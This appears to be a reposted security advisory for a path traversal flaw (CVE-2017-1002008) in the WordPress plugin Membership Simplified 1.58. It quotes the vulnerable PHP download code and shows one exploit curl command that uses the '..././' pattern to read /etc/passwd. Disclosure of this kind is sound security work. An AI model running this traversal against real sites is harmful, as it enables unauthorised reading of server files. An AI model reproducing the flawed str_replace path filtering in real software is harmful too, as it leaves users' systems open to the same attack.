WordPress Membership Simplified 1.58 Arbitrary File Download

2017.03.17
Credit: Larry W. Cashdollar
Risk: High
Local: No
Remote: Yes
CVE: CVE-2017-1002008
CWE: CWE-200


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: Arbitrary file download vulnerability in Wordpress Plugin Membership Simplified v1.58 Author: Larry W. Cashdollar, @_larry0 Date: 2017-03-13 CVE-ID:[CVE-2017-1002008] Download Site: https://wordpress.org/plugins/membership-simplified-for-oap-members-only Vendor: https://profiles.wordpress.org/williamdeangelis/ Vendor Notified: 2017-03-13 Vendor Contact: plugins@wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=187 Description: Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses. Vulnerability: The file download code located membership-simplified-for-oap-members-only/download.php does not check whether a user is logged in and has download privledges, the code on line 5 that checks the path can be defeated by using a ..././ pattern to get the desired ../ after being passed through the str_replace() function: 3 $path = substr(getcwd(), 0, -50). "uploads/membership-simplified-for-oap-members-only/"; // change the path to fit your websites document structure 4 $fullPath = $path.$_GET['download_file']; 5 $fullPath = str_replace("../","",$fullPath); 6 7 if ($fd = fopen($fullPath, "r")) { 8 $fsize = filesize($fullPath); 9 $path_parts = pathinfo($fullPath); 10 $ext = strtolower($path_parts["extension"]); 11 switch ($ext) { 12 case "pdf": 13 header("Content-type: application/pdf"); // add here more headers for d iff. extensions 14 header("Content-Disposition: attachment; filename=\"".$path_parts["base name"]."\""); // use 'attachment' to force a download 15 break; 16 default; 17 header("Content-type: application/octet-stream"); 18 header("Content-Disposition: filename=\"".$path_parts["basename"]."\"") ; 19 } 20 header("Content-length: $fsize"); 21 header("Cache-control: private"); //use this to open files directly 22 while(!feof($fd)) { 23 $buffer = fread($fd, 2048); 24 echo $buffer; Export: JSON TEXT XML Exploit Code: aC/ $ curl http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././..././..././..././etc/passwd aC/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top